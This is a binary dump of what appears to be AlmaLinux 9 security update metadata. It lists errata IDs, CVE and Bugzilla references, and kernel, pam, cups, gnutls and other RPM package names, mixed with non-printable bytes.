]kernel-debug-uki-virt-5.14.0-570.33.2.el9_6.x86_64.rpm%]kernel-uki-virt-addons-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-tools-5.14.0-570.33.2.el9_6.x86_64.rpm"]kernel-uki-virt-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-modules-extra-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-modules-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-modules-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-modules-core-5.14.0-570.33.2.el9_6.x86_64.rpm����
��mBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'���https://access.redhat.com/errata/RHSA-2025:13962RHSA-2025:13962RHSA-2025:13962https://access.redhat.com/security/cve/CVE-2024-28956CVE-2024-28956CVE-2024-28956https://access.redhat.com/security/cve/CVE-2025-21867CVE-2025-21867CVE-2025-21867https://access.redhat.com/security/cve/CVE-2025-38084CVE-2025-38084CVE-2025-38084https://access.redhat.com/security/cve/CVE-2025-38085CVE-2025-38085CVE-2025-38085https://access.redhat.com/security/cve/CVE-2025-38124CVE-2025-38124CVE-2025-38124https://access.redhat.com/security/cve/CVE-2025-38159CVE-2025-38159CVE-2025-38159https://access.redhat.com/security/cve/CVE-2025-38250CVE-2025-38250CVE-2025-38250https://access.redhat.com/security/cve/CVE-2025-38380CVE-2025-38380CVE-2025-38380https://access.redhat.com/security/cve/CVE-2025-38471CVE-2025-38471CVE-2025-38471https://bugzilla.redhat.com/23553342355334https://bugzilla.redhat.com/23661252366125https://bugzilla.redhat.com/23753032375303https://bugzilla.redhat.com/23753042375304https://bugzilla.redhat.com/23760412376041https://bugzilla.redhat.com/23760642376064https://bugzilla.redhat.com/23789822378982https://bugzilla.redhat.com/23833812383381https://bugzilla.redhat.com/23838932383893https://errata.almalinux.org/9/ALSA-2025-13962.htmlALSA-2025:13962ALSA-2025:13962 ^kernel-debug-uki-virt-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-tools-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-tools-libs-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-5.14.0-570.35.1.el9_6.x86_64.rpm%^kernel-uki-virt-addons-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-core-5.14.0-570.35.1.el9_6.x86_64.rpm!^kernel-modules-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-modules-extra-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-abi-stablelists-5.14.0-570.35.1.el9_6.noarch.rpm"^kernel-uki-virt-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-modules-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-extra-5.14.0-570.35.1.el9_6.x86_64.rpm ^kernel-debug-uki-virt-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-tools-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-tools-libs-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-5.14.0-570.35.1.el9_6.x86_64.rpm%^kernel-uki-virt-addons-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-core-5.14.0-570.35.1.el9_6.x86_64.rpm!^kernel-modules-core-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-modules-extra-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-abi-stablelists-5.14.0-570.35.1.el9_6.noarch.rpm"^kernel-uki-virt-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-modules-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-5.14.0-570.35.1.el9_6.x86_64.rpm^kernel-debug-modules-extra-5.14.0-570.35.1.el9_6.x86_64.rpm���
� �LBsecurityImportant: libarchive security update&'���}https://access.redhat.com/errata/RHSA-2025:14130RHSA-2025:14130RHSA-2025:14130https://access.redhat.com/security/cve/CVE-2025-5914CVE-2025-5914CVE-2025-5914https://bugzilla.redhat.com/23708612370861https://errata.almalinux.org/9/ALSA-2025-14130.htmlALSA-2025:14130ALSA-2025:14130�.�libarchive-3.5.3-6.el9_6.x86_64.rpm�.�libarchive-3.5.3-6.el9_6.i686.rpm�.�libarchive-3.5.3-6.el9_6.x86_64.rpm�.�libarchive-3.5.3-6.el9_6.i686.rpm�ŗ�l�
�!�OBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��
�!https://access.redhat.com/errata/RHSA-2025:14420RHSA-2025:14420RHSA-2025:14420https://access.redhat.com/security/cve/CVE-2025-22058CVE-2025-22058CVE-2025-22058https://access.redhat.com/security/cve/CVE-2025-37914CVE-2025-37914CVE-2025-37914https://access.redhat.com/security/cve/CVE-2025-38417CVE-2025-38417CVE-2025-38417https://bugzilla.redhat.com/23602762360276https://bugzilla.redhat.com/23675002367500https://bugzilla.redhat.com/23834632383463https://errata.almalinux.org/9/ALSA-2025-14420.htmlALSA-2025:14420ALSA-2025:14420_kernel-debug-core-5.14.0-570.37.1.el9_6.x86_64.rpm%_kernel-uki-virt-addons-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-modules-extra-5.14.0-570.37.1.el9_6.x86_64.rpm _kernel-debug-uki-virt-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-tools-libs-5.14.0-570.37.1.el9_6.x86_64.rpm"_kernel-uki-virt-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-modules-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-modules-5.14.0-570.37.1.el9_6.x86_64.rpm!_kernel-modules-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-tools-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-modules-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-abi-stablelists-5.14.0-570.37.1.el9_6.noarch.rpm_kernel-debug-modules-extra-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-core-5.14.0-570.37.1.el9_6.x86_64.rpm%_kernel-uki-virt-addons-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-modules-extra-5.14.0-570.37.1.el9_6.x86_64.rpm _kernel-debug-uki-virt-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-tools-libs-5.14.0-570.37.1.el9_6.x86_64.rpm"_kernel-uki-virt-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-modules-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-modules-5.14.0-570.37.1.el9_6.x86_64.rpm!_kernel-modules-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-tools-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-debug-modules-core-5.14.0-570.37.1.el9_6.x86_64.rpm_kernel-abi-stablelists-5.14.0-570.37.1.el9_6.noarch.rpm_kernel-debug-modules-extra-5.14.0-570.37.1.el9_6.x86_64.rpm��v� 
�"�nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��.�https://access.redhat.com/errata/RHSA-2025:15011RHSA-2025:15011RHSA-2025:15011https://bugzilla.redhat.com/23650242365024https://bugzilla.redhat.com/23763922376392https://bugzilla.redhat.com/23764062376406https://bugzilla.redhat.com/23820542382054https://bugzilla.redhat.com/23835092383509https://bugzilla.redhat.com/23835132383513https://bugzilla.redhat.com/23878662387866https://errata.almalinux.org/9/ALSA-2025-15011.htmlALSA-2025:15011ALSA-2025:15011https://www.redhat.com/security/data/cve/CVE-2025-37823.htmlCVE-2025-37823CVE-2025-37823https://www.redhat.com/security/data/cve/CVE-2025-38200.htmlCVE-2025-38200CVE-2025-38200https://www.redhat.com/security/data/cve/CVE-2025-38211.htmlCVE-2025-38211CVE-2025-38211https://www.redhat.com/security/data/cve/CVE-2025-38350.htmlCVE-2025-38350CVE-2025-38350https://www.redhat.com/security/data/cve/CVE-2025-38461.htmlCVE-2025-38461CVE-2025-38461https://www.redhat.com/security/data/cve/CVE-2025-38464.htmlCVE-2025-38464CVE-2025-38464https://www.redhat.com/security/data/cve/CVE-2025-38500.htmlCVE-2025-38500CVE-2025-38500https://www.redhat.com/security/data/cve/CVE-2025-38684.htmlCVE-2025-38684CVE-2025-38684`kernel-tools-libs-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-extra-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-modules-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-5.14.0-570.39.1.el9_6.x86_64.rpm!`kernel-modules-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-modules-extra-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-tools-5.14.0-570.39.1.el9_6.x86_64.rpm"`kernel-uki-virt-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-abi-stablelists-5.14.0-570.39.1.el9_6.noarch.rpm%`kernel-uki-virt-addons-5.14.0-570.39.1.el9_6.x86_64.rpm `kernel-debug-uki-virt-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-tools-libs-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-extra-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-modules-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-modules-5.14.0-570.39.1.el9_6.x86_64.rpm!`kernel-modules-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-modules-extra-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-tools-5.14.0-570.39.1.el9_6.x86_64.rpm"`kernel-uki-virt-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-abi-stablelists-5.14.0-570.39.1.el9_6.noarch.rpm%`kernel-uki-virt-addons-5.14.0-570.39.1.el9_6.x86_64.rpm `kernel-debug-uki-virt-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-debug-core-5.14.0-570.39.1.el9_6.x86_64.rpm`kernel-5.14.0-570.39.1.el9_6.x86_64.rpm���'�!
�#�MBBBsecurityModerate: python3.9 security update&��E�;https://access.redhat.com/errata/RHSA-2025:15019RHSA-2025:15019RHSA-2025:15019https://access.redhat.com/security/cve/CVE-2025-8194CVE-2025-8194CVE-2025-8194https://bugzilla.redhat.com/23840432384043https://errata.almalinux.org/9/ALSA-2025-15019.htmlALSA-2025:15019ALSA-2025:15019��python3-3.9.21-2.el9_6.2.x86_64.rpm-�python3-libs-3.9.21-2.el9_6.2.i686.rpm-�python3-libs-3.9.21-2.el9_6.2.x86_64.rpm��python3-3.9.21-2.el9_6.2.x86_64.rpm-�python3-libs-3.9.21-2.el9_6.2.i686.rpm-�python3-libs-3.9.21-2.el9_6.2.x86_64.rpm����"
�$�RBsecurityImportant: pam security update&'���phttps://access.redhat.com/errata/RHSA-2025:15099RHSA-2025:15099RHSA-2025:15099https://access.redhat.com/security/cve/CVE-2025-6020CVE-2025-6020CVE-2025-6020https://access.redhat.com/security/cve/CVE-2025-8941CVE-2025-8941CVE-2025-8941https://bugzilla.redhat.com/23725122372512https://bugzilla.redhat.com/23882202388220https://errata.almalinux.org/9/ALSA-2025-15099.htmlALSA-2025:15099ALSA-2025:15099�B�gpam-1.5.1-26.el9_6.x86_64.rpm�B�gpam-1.5.1-26.el9_6.i686.rpm�B�gpam-1.5.1-26.el9_6.x86_64.rpm�B�gpam-1.5.1-26.el9_6.i686.rpm����#
�%�UBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��p�Whttps://access.redhat.com/errata/RHSA-2025:15429RHSA-2025:15429RHSA-2025:15429https://access.redhat.com/security/cve/CVE-2025-37803CVE-2025-37803CVE-2025-37803https://access.redhat.com/security/cve/CVE-2025-38392CVE-2025-38392CVE-2025-38392https://bugzilla.redhat.com/23650132365013https://bugzilla.redhat.com/23834072383407https://errata.almalinux.org/9/ALSA-2025-15429.htmlALSA-2025:15429ALSA-2025:15429akernel-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-modules-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-abi-stablelists-5.14.0-570.41.1.el9_6.noarch.rpmakernel-debug-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-extra-5.14.0-570.41.1.el9_6.x86_64.rpm akernel-debug-uki-virt-5.14.0-570.41.1.el9_6.x86_64.rpm"akernel-uki-virt-5.14.0-570.41.1.el9_6.x86_64.rpm!akernel-modules-core-5.14.0-570.41.1.el9_6.x86_64.rpm%akernel-uki-virt-addons-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-tools-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-modules-extra-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-tools-libs-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-modules-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-abi-stablelists-5.14.0-570.41.1.el9_6.noarch.rpmakernel-debug-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-extra-5.14.0-570.41.1.el9_6.x86_64.rpm akernel-debug-uki-virt-5.14.0-570.41.1.el9_6.x86_64.rpm"akernel-uki-virt-5.14.0-570.41.1.el9_6.x86_64.rpm!akernel-modules-core-5.14.0-570.41.1.el9_6.x86_64.rpm%akernel-uki-virt-addons-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-tools-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-core-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-modules-extra-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-tools-libs-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-5.14.0-570.41.1.el9_6.x86_64.rpmakernel-debug-modules-5.14.0-570.41.1.el9_6.x86_64.rpm�Ɵ�+�$
�&�tBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��G�
https://access.redhat.com/errata/RHSA-2025:15661RHSA-2025:15661RHSA-2025:15661https://access.redhat.com/security/cve/CVE-2025-22097CVE-2025-22097CVE-2025-22097https://access.redhat.com/security/cve/CVE-2025-38332CVE-2025-38332CVE-2025-38332https://access.redhat.com/security/cve/CVE-2025-38352CVE-2025-38352CVE-2025-38352https://access.redhat.com/security/cve/CVE-2025-38449CVE-2025-38449CVE-2025-38449https://bugzilla.redhat.com/23602232360223https://bugzilla.redhat.com/23792462379246https://bugzilla.redhat.com/23825812382581https://bugzilla.redhat.com/23835192383519https://errata.almalinux.org/9/ALSA-2025-15661.htmlALSA-2025:15661ALSA-2025:15661!bkernel-modules-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-core-5.14.0-570.42.2.el9_6.x86_64.rpm"bkernel-uki-virt-5.14.0-570.42.2.el9_6.x86_64.rpm%bkernel-uki-virt-addons-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-extra-5.14.0-570.42.2.el9_6.x86_64.rpm bkernel-debug-uki-virt-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-modules-extra-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-tools-libs-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-modules-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-tools-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-abi-stablelists-5.14.0-570.42.2.el9_6.noarch.rpm!bkernel-modules-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-core-5.14.0-570.42.2.el9_6.x86_64.rpm"bkernel-uki-virt-5.14.0-570.42.2.el9_6.x86_64.rpm%bkernel-uki-virt-addons-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-extra-5.14.0-570.42.2.el9_6.x86_64.rpm bkernel-debug-uki-virt-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-modules-extra-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-tools-libs-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-modules-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-core-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-debug-modules-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-tools-5.14.0-570.42.2.el9_6.x86_64.rpmbkernel-abi-stablelists-5.14.0-570.42.2.el9_6.noarch.rpm�Ƥ�U�%
�'�SBsecurityImportant: cups security update&'��a�
https://access.redhat.com/errata/RHSA-2025:15700RHSA-2025:15700RHSA-2025:15700https://access.redhat.com/security/cve/CVE-2025-58060CVE-2025-58060CVE-2025-58060https://access.redhat.com/security/cve/CVE-2025-58364CVE-2025-58364CVE-2025-58364https://bugzilla.redhat.com/23925952392595https://bugzilla.redhat.com/23930782393078https://errata.almalinux.org/9/ALSA-2025-15700.htmlALSA-2025:15700ALSA-2025:15700�+�pcups-libs-2.3.3op2-33.el9_6.1.x86_64.rpm�+�pcups-libs-2.3.3op2-33.el9_6.1.i686.rpm�+�pcups-libs-2.3.3op2-33.el9_6.1.x86_64.rpm�+�pcups-libs-2.3.3op2-33.el9_6.1.i686.rpm���S�&
�(�VBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��n�https://access.redhat.com/errata/RHSA-2025:15740RHSA-2025:15740RHSA-2025:15740https://access.redhat.com/security/cve/CVE-2025-38550CVE-2025-38550CVE-2025-38550https://bugzilla.redhat.com/23889412388941https://errata.almalinux.org/9/ALSA-2025-15740.htmlALSA-2025:15740ALSA-2025:15740%ckernel-uki-virt-addons-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-abi-stablelists-5.14.0-570.44.1.el9_6.noarch.rpm"ckernel-uki-virt-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-modules-extra-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-tools-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-extra-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-modules-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-tools-libs-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-5.14.0-570.44.1.el9_6.x86_64.rpm!ckernel-modules-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-core-5.14.0-570.44.1.el9_6.x86_64.rpm ckernel-debug-uki-virt-5.14.0-570.44.1.el9_6.x86_64.rpm%ckernel-uki-virt-addons-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-abi-stablelists-5.14.0-570.44.1.el9_6.noarch.rpm"ckernel-uki-virt-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-modules-extra-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-tools-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-modules-extra-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-modules-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-tools-libs-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-5.14.0-570.44.1.el9_6.x86_64.rpm!ckernel-modules-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-core-5.14.0-570.44.1.el9_6.x86_64.rpmckernel-debug-core-5.14.0-570.44.1.el9_6.x86_64.rpm ckernel-debug-uki-virt-5.14.0-570.44.1.el9_6.x86_64.rpm��ԃP�'
�7�usecurityModerate: python-cryptography security update&��n�Lhttps://access.redhat.com/errata/RHSA-2025:15874RHSA-2025:15874RHSA-2025:15874https://access.redhat.com/security/cve/CVE-2023-49083CVE-2023-49083CVE-2023-49083https://bugzilla.redhat.com/22553312255331https://errata.almalinux.org/9/ALSA-2025-15874.htmlALSA-2025:15874ALSA-2025:15874�w�/python3-cryptography-36.0.1-5.el9_6.x86_64.rpm�w�/python3-cryptography-36.0.1-5.el9_6.x86_64.rpm�Ư�#�(
�)�xBsecurityModerate: gnutls security, bug fix, and enhancement update&��:�
https://access.redhat.com/errata/RHSA-2025:16116RHSA-2025:16116RHSA-2025:16116https://access.redhat.com/security/cve/CVE-2025-32988CVE-2025-32988CVE-2025-32988https://access.redhat.com/security/cve/CVE-2025-32989CVE-2025-32989CVE-2025-32989https://access.redhat.com/security/cve/CVE-2025-32990CVE-2025-32990CVE-2025-32990https://access.redhat.com/security/cve/CVE-2025-6395CVE-2025-6395CVE-2025-6395https://bugzilla.redhat.com/23596202359620https://bugzilla.redhat.com/23596212359621https://bugzilla.redhat.com/23596222359622https://bugzilla.redhat.com/23767552376755https://errata.almalinux.org/9/ALSA-2025-16116.htmlALSA-2025:16116ALSA-2025:16116�#�gnutls-3.8.3-6.el9_6.2.x86_64.rpm�#�gnutls-3.8.3-6.el9_6.2.i686.rpm�#�gnutls-3.8.3-6.el9_6.2.x86_64.rpm�#�gnutls-3.8.3-6.el9_6.2.i686.rpm���
�)
�*�{BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��K�
https://access.redhat.com/errata/RHSA-2025:16398RHSA-2025:16398RHSA-2025:16398https://access.redhat.com/security/cve/CVE-2023-53125CVE-2023-53125CVE-2023-53125https://access.redhat.com/security/cve/CVE-2025-37810CVE-2025-37810CVE-2025-37810https://access.redhat.com/security/cve/CVE-2025-38498CVE-2025-38498CVE-2025-38498https://access.redhat.com/security/cve/CVE-2025-39694CVE-2025-39694CVE-2025-39694https://bugzilla.redhat.com/23636862363686https://bugzilla.redhat.com/23650282365028https://bugzilla.redhat.com/23844222384422https://bugzilla.redhat.com/23935342393534https://errata.almalinux.org/9/ALSA-2025-16398.htmlALSA-2025:16398ALSA-2025:16398dkernel-core-5.14.0-570.46.1.el9_6.x86_64.rpm dkernel-debug-uki-virt-5.14.0-570.46.1.el9_6.x86_64.rpm!dkernel-modules-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-tools-libs-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-5.14.0-570.46.1.el9_6.x86_64.rpm%dkernel-uki-virt-addons-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-tools-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-extra-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-abi-stablelists-5.14.0-570.46.1.el9_6.noarch.rpmdkernel-modules-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-modules-extra-5.14.0-570.46.1.el9_6.x86_64.rpm"dkernel-uki-virt-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-core-5.14.0-570.46.1.el9_6.x86_64.rpm dkernel-debug-uki-virt-5.14.0-570.46.1.el9_6.x86_64.rpm!dkernel-modules-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-tools-libs-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-5.14.0-570.46.1.el9_6.x86_64.rpm%dkernel-uki-virt-addons-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-tools-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-modules-extra-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-abi-stablelists-5.14.0-570.46.1.el9_6.noarch.rpmdkernel-modules-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-debug-core-5.14.0-570.46.1.el9_6.x86_64.rpmdkernel-modules-extra-5.14.0-570.46.1.el9_6.x86_64.rpm"dkernel-uki-virt-5.14.0-570.46.1.el9_6.x86_64.rpm���r�*
�+�ZBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��R�https://access.redhat.com/errata/RHSA-2025:1659RHSA-2025:1659RHSA-2025:1659https://access.redhat.com/security/cve/CVE-2023-52490CVE-2023-52490CVE-2023-52490https://bugzilla.redhat.com/22691872269187https://errata.almalinux.org/9/ALSA-2025-1659.htmlALSA-2025:1659ALSA-2025:16592:python3-perf-5.14.0-503.26.1.el9_5.x86_64.rpm%:kernel-uki-virt-addons-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-abi-stablelists-5.14.0-503.26.1.el9_5.noarch.rpm1�Qbpftool-7.4.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-tools-5.14.0-503.26.1.el9_5.x86_64.rpm!:kernel-modules-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-modules-extra-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-tools-libs-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-core-5.14.0-503.26.1.el9_5.x86_64.rpm":kernel-uki-virt-5.14.0-503.26.1.el9_5.x86_64.rpm :kernel-debug-uki-virt-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-extra-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-modules-5.14.0-503.26.1.el9_5.x86_64.rpm2:python3-perf-5.14.0-503.26.1.el9_5.x86_64.rpm%:kernel-uki-virt-addons-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-abi-stablelists-5.14.0-503.26.1.el9_5.noarch.rpm1�Qbpftool-7.4.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-tools-5.14.0-503.26.1.el9_5.x86_64.rpm!:kernel-modules-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-modules-extra-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-tools-libs-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-core-5.14.0-503.26.1.el9_5.x86_64.rpm":kernel-uki-virt-5.14.0-503.26.1.el9_5.x86_64.rpm :kernel-debug-uki-virt-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-core-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-debug-modules-extra-5.14.0-503.26.1.el9_5.x86_64.rpm:kernel-modules-5.14.0-503.26.1.el9_5.x86_64.rpm����J�+
